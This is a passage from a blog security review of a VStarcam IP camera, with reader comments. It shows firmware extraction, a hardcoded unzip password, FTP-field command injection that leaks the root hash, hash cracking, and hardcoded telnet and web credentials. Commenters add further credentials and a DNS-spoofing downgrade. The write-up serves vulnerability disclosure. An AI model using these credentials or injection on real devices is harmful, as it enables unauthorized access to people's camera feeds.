363255        0x58AF7         Zip encrypted archive data, at least v2.0 to extract, compressed size: 4151,  uncompressed size: 4369, name: "www/jquery/images/ui-icons_ef8c08_256x240.png"
367497        0x59B89         Zip encrypted archive data, at least v2.0 to extract, compressed size: 4152,  uncompressed size: 4369, name: "www/jquery/images/ui-icons_ffd27a_256x240.png"
371740        0x5AC1C         Zip encrypted archive data, at least v2.0 to extract, compressed size: 4151,  uncompressed size: 4369, name: "www/jquery/images/ui-icons_ffffff_256x240.png"
375982        0x5BCAE         Zip encrypted archive data, at least v2.0 to extract, compressed size: 4206,  uncompressed size: 22938, name: "www/jquery/jquery-ui-1.8.18.custom.css"
380272        0x5CD70         Zip encrypted archive data, at least v2.0 to extract, compressed size: 7539,  uncompressed size: 27218, name: "www/jquery/jquery-ui-1.8.18.custom.min.js"
387898        0x5EB3A         Zip encrypted archive data, at least v2.0 to extract, compressed size: 33625,  uncompressed size: 94843, name: "www/jquery/jquery.min.js"
421593        0x66ED9         Zip encrypted archive data, at least v2.0 to extract, compressed size: 7855,  uncompressed size: 31770, name: "www/jquery/meioMask.js"
429516        0x68DCC         Zip encrypted archive data, at least v2.0 to extract, compressed size: 132400,  uncompressed size: 149040, name: "www/linkfail.wav"
561978        0x8933A         Zip encrypted archive data, at least v2.0 to extract, compressed size: 81259,  uncompressed size: 92720, name: "www/linking.wav"
643298        0x9D0E2         Zip encrypted archive data, at least v2.0 to extract, compressed size: 88942,  uncompressed size: 97664, name: "www/linksuccess.wav"
732305        0xB2C91         Zip encrypted archive data, at least v2.0 to extract, compressed size: 783,  uncompressed size: 1581, name: "www/live.htm"
733146        0xB2FDA         Zip encrypted archive data, at least v2.0 to extract, compressed size: 795,  uncompressed size: 1719, name: "www/log.htm"
733998        0xB332E         Zip encrypted archive data, at least v2.0 to extract, compressed size: 1830,  uncompressed size: 7813, name: "www/login.htm"
735887        0xB3A8F         Zip encrypted archive data, at least v2.0 to extract, compressed size: 42,  uncompressed size: 31, name: "www/logo.js"
735986        0xB3AF2         Zip encrypted archive data, at least v2.0 to extract, compressed size: 1857,  uncompressed size: 7447, name: "www/mail.htm"
737901        0xB426D         Zip encrypted archive data, at least v2.0 to extract, compressed size: 69,  uncompressed size: 69, name: "www/mime.types"
738030        0xB42EE         Zip encrypted archive data, at least v2.0 to extract, compressed size: 31123,  uncompressed size: 34856, name: "www/mls.wav"
769210        0xBBCBA         Zip encrypted archive data, at least v2.0 to extract, compressed size: 11055,  uncompressed size: 64215, name: "www/monitor.htm"
780326        0xBE826         Zip encrypted archive data, at least v2.0 to extract, compressed size: 7280,  uncompressed size: 42747, name: "www/monitor2.htm"
787668        0xC04D4         Zip encrypted archive data, at least v2.0 to extract, compressed size: 3964,  uncompressed size: 30410, name: "www/multidev.htm"
791694        0xC148E         Zip encrypted archive data, at least v2.0 to extract, compressed size: 3559,  uncompressed size: 28945, name: "www/multidev2.htm"
795316        0xC22B4         Zip encrypted archive data, at least v2.0 to extract, compressed size: 102,  uncompressed size: 127, name: "www/oem.js"
795474        0xC2352         Zip encrypted archive data, at least v1.0 to extract, compressed size: 20,  uncompressed size: 8, name: "www/oem.txt"
795551        0xC239F         Zip encrypted archive data, at least v2.0 to extract, compressed size: 1200,  uncompressed size: 3859, name: "www/pda.htm"
796808        0xC2888         Zip encrypted archive data, at least v2.0 to extract, compressed size: 1290,  uncompressed size: 4992, name: "www/ptz.htm"
798155        0xC2DCB         Zip encrypted archive data, at least v2.0 to extract, compressed size: 1077,  uncompressed size: 3336, name: "www/public.js"
799291        0xC323B         Zip encrypted archive data, at least v2.0 to extract, compressed size: 535,  uncompressed size: 1138, name: "www/reboot.htm"
799886        0xC348E         Zip encrypted archive data, at least v2.0 to extract, compressed size: 337,  uncompressed size: 535, name: "www/rebootme.htm"
800285        0xC361D         Zip encrypted archive data, at least v2.0 to extract, compressed size: 1216,  uncompressed size: 4169, name: "www/recordpath.htm"
801565        0xC3B1D         Zip encrypted archive data, at least v2.0 to extract, compressed size: 2760,  uncompressed size: 9013, name: "www/recordplay.htm"
804389        0xC4625         Zip encrypted archive data, at least v2.0 to extract, compressed size: 1961,  uncompressed size: 6499, name: "www/recordplay2.htm"
806415        0xC4E0F         Zip encrypted archive data, at least v2.0 to extract, compressed size: 3288,  uncompressed size: 13366, name: "www/recordsch.htm"
809766        0xC5B26         Zip encrypted archive data, at least v2.0 to extract, compressed size: 105533,  uncompressed size: 118284, name: "www/resetok.wav"
915360        0xDF7A0         Zip encrypted archive data, at least v2.0 to extract, compressed size: 285,  uncompressed size: 427, name: "www/rowscolor.js"
915707        0xDF8FB         Zip encrypted archive data, at least v1.0 to extract, compressed size: 188,  uncompressed size: 176, name: "www/sensordata.bin"
915959        0xDF9F7         Zip encrypted archive data, at least v2.0 to extract, compressed size: 927,  uncompressed size: 2794, name: "www/setddns.htm"
916947        0xDFDD3         Zip encrypted archive data, at least v2.0 to extract, compressed size: 781,  uncompressed size: 2340, name: "www/setstep.htm"
917789        0xE011D         Zip encrypted archive data, at least v2.0 to extract, compressed size: 997,  uncompressed size: 2217, name: "www/setuid.htm"
918846        0xE053E         Zip encrypted archive data, at least v1.0 to extract, compressed size: 12,  name: "www/simple_chinese/"
918923        0xE058B         Zip encrypted archive data, at least v2.0 to extract, compressed size: 225,  uncompressed size: 461, name: "www/simple_chinese/oem.js"
919219        0xE06B3         Zip encrypted archive data, at least v2.0 to extract, compressed size: 11293,  uncompressed size: 31404, name: "www/simple_chinese/string.js"
930586        0xE331A         Zip encrypted archive data, at least v2.0 to extract, compressed size: 389,  uncompressed size: 719, name: "www/snapshot.htm"
931037        0xE34DD         Zip encrypted archive data, at least v2.0 to extract, compressed size: 27,  uncompressed size: 32, name: "www/sotfLimitParam.ini"
931132        0xE353C         Zip encrypted archive data, at least v2.0 to extract, compressed size: 1499,  uncompressed size: 5753, name: "www/status.htm"
932691        0xE3B53         Zip encrypted archive data, at least v2.0 to extract, compressed size: 892,  uncompressed size: 4302, name: "www/style.css"
933642        0xE3F0A         Zip encrypted archive data, at least v1.0 to extract, compressed size: 14,  uncompressed size: 2, name: "www/test.txt"
933714        0xE3F52         Zip encrypted archive data, at least v2.0 to extract, compressed size: 516,  uncompressed size: 1441, name: "www/test_ftp.htm"
934292        0xE4194         Zip encrypted archive data, at least v2.0 to extract, compressed size: 524,  uncompressed size: 1462, name: "www/test_mail.htm"
934879        0xE43DF         Zip encrypted archive data, at least v2.0 to extract, compressed size: 145,  uncompressed size: 188, name: "www/unauth.htm"
935084        0xE44AC         Zip encrypted archive data, at least v2.0 to extract, compressed size: 826,  uncompressed size: 2513, name: "www/upgrade.htm"
935971        0xE4823         Zip encrypted archive data, at least v2.0 to extract, compressed size: 841,  uncompressed size: 2009, name: "www/upnp.htm"
936870        0xE4BA6         Zip encrypted archive data, at least v2.0 to extract, compressed size: 1355,  uncompressed size: 5074, name: "www/user.htm"
938283        0xE512B         Zip encrypted archive data, at least v2.0 to extract, compressed size: 92024,  uncompressed size: 102860, name: "www/vfaile.wav"
1030367       0xFB8DF         Zip encrypted archive data, at least v1.0 to extract, compressed size: 12,  name: "www/video.cab"
1030438       0xFB926         Zip encrypted archive data, at least v1.0 to extract, compressed size: 12,  name: "www/video.exe"
1030509       0xFB96D         Zip encrypted archive data, at least v2.0 to extract, compressed size: 1504,  uncompressed size: 8824, name: "www/video.htm"
1032072       0xFBF88         Zip encrypted archive data, at least v2.0 to extract, compressed size: 92722,  uncompressed size: 103604, name: "www/vwificonfig.wav"
1124859       0x1129FB        Zip encrypted archive data, at least v2.0 to extract, compressed size: 94398,  uncompressed size: 102768, name: "www/wificonfig.wav"
1219321       0x129AF9        Zip encrypted archive data, at least v2.0 to extract, compressed size: 2748,  uncompressed size: 11609, name: "www/wireless.htm"
1235916       0x12DBCC        End of Zip archive

The zip files are password protected.
Another way to check :

> unzip CH-app-EN53.8.1.13_VSTARCAM.bin
Archive:  CH-app-EN53.8.1.13_VSTARCAM.bin
warning [CH-app-EN53.8.1.13_VSTARCAM.bin]:  36 extra bytes at beginning or within zipfile
  (attempting to process anyway)
[CH-app-EN53.8.1.13_VSTARCAM.bin] www/ password:

The easiest way is to go back to the firmware folder and look for the unzipping password :

> cd ../firmware/_CH-sys-48.53.64.67.bin.extracted/

And use the same method that we used to find the root password. Look for any unzip command in files :

> grep -r "unzip" .
Binary file ./system/system/bin/updata matches
Binary file ./system/system/bin/wifidaemon matches
Binary file ./system/system/bin/encoder matches

And check in the updata file for the password :

> strings system/system/bin/updata | grep -A 1 -B 1 unzip
cp /tmp/network-b.ini /system/www/network-b.ini
unzip www is start...
/system/system/bin/unzip1 -o -P vstarcam!@#$%  /tmp/www.zip -d /system  > /tmp/app.txt
unzip www is end
rm /tmp/www.zip

Unzipping password : vstarcam!@#$% (better than 123456 by the way !).

Let’s go back to WebUI unzipping :

cd ../../webui/

And use the previous password to unzip the file :

> unzip CH-app-EN53.8.1.13_VSTARCAM.bin
Archive:  CH-app-EN53.8.1.13_VSTARCAM.bin
warning [CH-app-EN53.8.1.13_VSTARCAM.bin]:  36 extra bytes at beginning or within zipfile
  (attempting to process anyway)
[CH-app-EN53.8.1.13_VSTARCAM.bin] www/ password:
   creating: www/
  inflating: www/admin.htm
  inflating: www/admin2.htm
  inflating: www/alarm.htm
  inflating: www/alarm.pcm
  inflating: www/alias.htm
  inflating: www/ap.htm
 extracting: www/appver.js
  inflating: www/audio.htm
  inflating: www/audioparam.bin
  inflating: www/datetime.htm
  inflating: www/ddns.htm
  inflating: www/dns.htm
   creating: www/english/
  inflating: www/english/oem.js
  inflating: www/english/string.js
  inflating: www/ftp.htm
  inflating: www/functions.htm
   creating: www/images/
 extracting: www/images/2_10.gif
  inflating: www/images/2_11.gif
  inflating: www/images/2_13.gif
 extracting: www/images/2_16.gif
 extracting: www/images/2_17.gif
  inflating: www/images/2_19.gif
 extracting: www/images/2_20.gif
 extracting: www/images/2_27.gif
  inflating: www/images/2_item.gif
  inflating: www/images/333.gif
  inflating: www/images/alarm.gif
  inflating: www/images/alarm.wav
  inflating: www/images/alert.gif
  inflating: www/images/autopos.gif
 extracting: www/images/back.gif
  inflating: www/images/bg.png
  inflating: www/images/bg_right.jpg
  inflating: www/images/btn_circle.gif
  inflating: www/images/btn_jianting.gif
  inflating: www/images/btn_jianting_on.gif
  inflating: www/images/btn_luxiang.gif
  inflating: www/images/btn_luxiang_on.gif
 extracting: www/images/btn_paizhao.gif
 extracting: www/images/btn_shezhi.gif
  inflating: www/images/btn_talk.gif
  inflating: www/images/btn_talk_on.gif
 extracting: www/images/CD.gif
 extracting: www/images/client.gif
  inflating: www/images/clr_bright.gif
  inflating: www/images/clr_contast.gif
  inflating: www/images/clr_hue.gif
  inflating: www/images/clr_saturation.gif
  inflating: www/images/del.gif
  inflating: www/images/download.gif
  inflating: www/images/elogo.gif
 extracting: www/images/firefox.gif
  inflating: www/images/green.gif
  inflating: www/images/hpatrol.gif
 extracting: www/images/hpatrol_down.gif
  inflating: www/images/hpatrol_up.gif
 extracting: www/images/IE.gif
  inflating: www/images/index_bg.gif
 extracting: www/images/iphone.gif
  inflating: www/images/ir0.gif
  inflating: www/images/ir1.gif
  inflating: www/images/line.gif
  inflating: www/images/logo.gif
  inflating: www/images/logo1.gif
 extracting: www/images/logo2.gif
  inflating: www/images/mirror.gif
  inflating: www/images/mirror_on.gif
 extracting: www/images/modellogo.gif
  inflating: www/images/nav-1.gif
  inflating: www/images/nav.gif
  inflating: www/images/network.gif
  inflating: www/images/no.gif
  inflating: www/images/ok.gif
  inflating: www/images/option.gif
 extracting: www/images/osd01.gif
 extracting: www/images/osd02.gif
  inflating: www/images/p.gif
 extracting: www/images/pan_1.gif
 extracting: www/images/pan_2.gif
 extracting: www/images/pan_3.gif
 extracting: www/images/pan_4.gif
 extracting: www/images/phone.gif
 extracting: www/images/playback.gif
  inflating: www/images/ptz_19.gif
  inflating: www/images/ptz_24.gif
  inflating: www/images/ptz_26.gif
  inflating: www/images/ptz_29.gif
  inflating: www/images/ptz_34.gif
  inflating: www/images/pt_speed.gif
 extracting: www/images/rec.gif
  inflating: www/images/record.gif
  inflating: www/images/red.gif
  inflating: www/images/reversal.gif
  inflating: www/images/reversal_on.gif
 extracting: www/images/signal0.png
 extracting: www/images/signal1.png
 extracting: www/images/signal2.png
 extracting: www/images/signal3.png
 extracting: www/images/signal4.png
 extracting: www/images/signal5.png
  inflating: www/images/space.gif
  inflating: www/images/switchoff_up.gif
  inflating: www/images/switchon_up.gif
  inflating: www/images/vpatrol.gif
  inflating: www/images/vpatrol_down.gif
  inflating: www/images/vpatrol_up.gif
  inflating: www/images/x1_off.gif
  inflating: www/images/x1_on.gif
  inflating: www/images/x4_off.gif
  inflating: www/images/x4_on.gif
 extracting: www/images/x9_off.gif
  inflating: www/images/x9_on.gif
  inflating: www/index.htm
  inflating: www/ip.htm
  inflating: www/iphone.htm
   creating: www/jquery/
   creating: www/jquery/images/
  inflating: www/jquery/images/ui-bg_diagonals-thick_18_b81900_40x40.png
 extracting: www/jquery/images/ui-bg_diagonals-thick_20_666666_40x40.png
  inflating: www/jquery/images/ui-bg_flat_0_aaaaaa_40x100.png
  inflating: www/jquery/images/ui-bg_flat_10_000000_40x100.png
  inflating: www/jquery/images/ui-bg_flat_75_ffffff_40x100.png
  inflating: www/jquery/images/ui-bg_glass_100_f6f6f6_1x400.png
  inflating: www/jquery/images/ui-bg_glass_100_fdf5ce_1x400.png
  inflating: www/jquery/images/ui-bg_glass_55_fbf9ee_1x400.png
  inflating: www/jquery/images/ui-bg_glass_65_ffffff_1x400.png
  inflating: www/jquery/images/ui-bg_glass_75_dadada_1x400.png
  inflating: www/jquery/images/ui-bg_glass_75_e6e6e6_1x400.png
  inflating: www/jquery/images/ui-bg_glass_95_fef1ec_1x400.png
  inflating: www/jquery/images/ui-bg_gloss-wave_35_f6a828_500x100.png
  inflating: www/jquery/images/ui-bg_highlight-soft_100_eeeeee_1x100.png
  inflating: www/jquery/images/ui-bg_highlight-soft_75_cccccc_1x100.png
  inflating: www/jquery/images/ui-bg_highlight-soft_75_ffe45c_1x100.png
  inflating: www/jquery/images/ui-icons_222222_256x240.png
  inflating: www/jquery/images/ui-icons_228ef1_256x240.png
  inflating: www/jquery/images/ui-icons_2e83ff_256x240.png
  inflating: www/jquery/images/ui-icons_454545_256x240.png
  inflating: www/jquery/images/ui-icons_888888_256x240.png
  inflating: www/jquery/images/ui-icons_cd0a0a_256x240.png
  inflating: www/jquery/images/ui-icons_ef8c08_256x240.png
  inflating: www/jquery/images/ui-icons_ffd27a_256x240.png
  inflating: www/jquery/images/ui-icons_ffffff_256x240.png
  inflating: www/jquery/jquery-ui-1.8.18.custom.css
  inflating: www/jquery/jquery-ui-1.8.18.custom.min.js
  inflating: www/jquery/jquery.min.js
  inflating: www/jquery/meioMask.js
  inflating: www/linkfail.wav
  inflating: www/linking.wav
  inflating: www/linksuccess.wav
  inflating: www/live.htm
  inflating: www/log.htm
  inflating: www/login.htm
  inflating: www/logo.js
  inflating: www/mail.htm
  inflating: www/mime.types
  inflating: www/mls.wav
  inflating: www/monitor.htm
  inflating: www/monitor2.htm
  inflating: www/multidev.htm
  inflating: www/multidev2.htm
  inflating: www/oem.js
 extracting: www/oem.txt
  inflating: www/pda.htm
  inflating: www/ptz.htm
  inflating: www/public.js
  inflating: www/reboot.htm
  inflating: www/rebootme.htm
  inflating: www/recordpath.htm
  inflating: www/recordplay.htm
  inflating: www/recordplay2.htm
  inflating: www/recordsch.htm
  inflating: www/resetok.wav
  inflating: www/rowscolor.js
 extracting: www/sensordata.bin
  inflating: www/setddns.htm
  inflating: www/setstep.htm
  inflating: www/setuid.htm
   creating: www/simple_chinese/
  inflating: www/simple_chinese/oem.js
  inflating: www/simple_chinese/string.js
  inflating: www/snapshot.htm
  inflating: www/sotfLimitParam.ini
  inflating: www/status.htm
  inflating: www/style.css
 extracting: www/test.txt
  inflating: www/test_ftp.htm
  inflating: www/test_mail.htm
  inflating: www/unauth.htm
  inflating: www/upgrade.htm
  inflating: www/upnp.htm
  inflating: www/user.htm
  inflating: www/vfaile.wav
 extracting: www/video.cab
 extracting: www/video.exe
  inflating: www/video.htm
  inflating: www/vwificonfig.wav
  inflating: www/wificonfig.wav
  inflating: www/wireless.htm

Done !

4.3 Method 3 : Injection

Thanks to this article, we know that the system is interpreting the FTP user, so proceed as follow :
injection-form

Save and proceed to a “test”. Then monitor the FTP server logs :

FTP session opened.
USER root:LSiuY7pOmZG2s:0:0:Administrator:/:/bin/sh: no such user found from 192.168.1.16 [192.168.1.16] to ::ffff:192.168.1.15:21
2FTP session closed.

So the hashed password for root user is : LSiuY7pOmZG2s. As already mentioned before, easy to decode :

> echo "root:LSiuY7pOmZG2s" > password.txt
> john password.txt
Loaded 1 password hash (Traditional DES [128/128 BS SSE2-16])
123456           (root)
guesses: 1  time: 0:00:00:00 100% (2)  c/s: 17680  trying: 12345 - biteme
Use the "--show" option to display all of the cracked passwords reliably

5. Web interface penetration test

Initiate a telnet connection on the camera using the credentials found earlier.
Then it’s easy to find the web interface password :

> find -name "*.cgi"
./system/param/login.cgi

> strings system/param/login.cgi | grep -A 1 -B 1 pass
var loginuser="admin";
var loginpass="erocgfhruehgi3ureozkfx";
var pri=255;

6. Links

http://catdevzero.blogspot.sg/2015/02/experiments-with-ip-camera-part-1.html
http://liken.otsoa.net/blog/?x=entry:entry140322-183809
http://jumpespjump.blogspot.co.uk/2015/09/how-i-hacked-my-ip-camera-and-found.html
https://www.pentestpartners.com/blog/hacking-the-ip-camera-part-1/

17 thoughts on “C7824WIP Security Review”

  1. Very nice, on my camera the password is a empty string.

    There is a interesting line.
    It would appear that the password is generated randomly by a program or function call CreateTelnetPasswd.

    How would you recommend getting telnet access?

    ===websLaunchCgiProc===
    /etc/passwd
    vstarcam2015:%s:0:0:Administrator:/:/bin/sh
    /etc/group
    root:x:0:admin
    CreateTelnetPasswd
    WebReadParam
    /
    …skipping
    root:LSiuY7pOmZG2s:0:0:Administrator:/:/bin/sh

    1. Never mind my last post, the FTP thing worked. The password might take a while to crack tho.
      I wish these camera were Open-Source, they could probably sell more units if they did that.

      1. BTW , for any one else reading this the password was 20150602 for firmware 48.53.72.74. The username was vstarcam2015

        Thanks for the great article on reverse engineering.

  2. Hi guys,

    Great article, I learned a lot from it.

    I have this cam and I want to use it in a secure way. When I disable traffic to internet for this device on my router and reboot the cam, I can’t connect anymore via the Android application (eye4). Even telnet and nmap don’t show life.

    I tried to find another application that could connect internally but none of them succeeds to show any frame.

    Someone kowns about some good app?

    10x
    Daniel

    1. Daniel,

      I would not be surprised that the Eye4 app is not working anymore after that.
      However it is unlikely that telnet and HTTP no longer work. Did you try to ping the cam ?

      If NMAP is not showing up anything, any client will be able to connect.

    1. Hi,

      Unfortunately I don’t have the camera anymore but if I remember correctly, this should be mentioned somewhere on the Web UI (maintenance, system or something similar).

      Ronan

  3. Very interesting article, I was going to buy this camera as baby monitor.
    Just a couple of questions: would be a little less insecure changing the root password to something a bit harder to brute-force than 123456?
    Furthermore what if I don’t forward the telnet and ftp port?
    Thanks!

    1. Not really, it’s reseted when the camera boots up, and for me the biggest issue is to have a videostream going on unknown servers…

      But having this camera running on a local network without internet connection should be ok…

  4. It seems they have addressed the security vulnerabilities. Today I updated the firmware and NMAP didn’t show any open ports…

    1. Hi,

      Good to know ! Maybe they didn’t fix the injection breach, and there is still a way to activate Telnet by this way.

      Ronan

  5. you can easily spoof the dns for the update request wherby pointing it to an ip holding older firmware, I have successfully got telnet working however the web interface has been removed it seems.

Leave a Reply to ej fudd Cancel reply

Your email address will not be published. Required fields are marked *